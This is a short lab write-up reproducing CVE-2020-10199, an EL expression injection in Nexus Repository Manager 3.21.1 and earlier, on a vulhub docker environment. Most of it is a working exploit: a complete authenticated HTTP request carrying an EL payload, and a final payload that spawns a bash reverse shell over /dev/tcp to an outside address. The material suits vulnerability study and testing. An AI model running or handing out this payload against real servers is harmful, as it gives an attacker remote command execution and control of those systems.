Introduction
Nexus Repository Manager 3 is a software repository that can be used to store and distribute software source repositories such as Maven and NuGET. In its 3.21.1 and earlier versions, there is an arbitrary EL expression injection vulnerability.
Affected version
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
Reference link
- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
- https://github.com/threedr3am/learnjavabug/blob/93d57c4283/nexus/CVE-2020-10199/README.md
- https://github.com/jas502n/CVE-2020-10199
Environment setup
docker environment +vulhub.
git clone https://github.com/vulhub/vulhub.git
Enter the corresponding directory:
Use the docker-compose up -dstartup environment.
After starting the environment, visit ip:8081:
Vulnerability recurrence
Use the account password to admin:adminlog in to the background.
After logging in, copy the current Cookie and CSRF Token, and send the following data packet to execute the EL expression:
Data packet:
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close
{
"name": "internal",
"online": true,
"storage": {
"blobStoreName": "default",
"strictContentTypeValidation": true
},
"group": {
"memberNames": ["$\\A{9*9}"]
}
}
Reverse shell:
"$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/192.168.133.129/7777<&1')}"
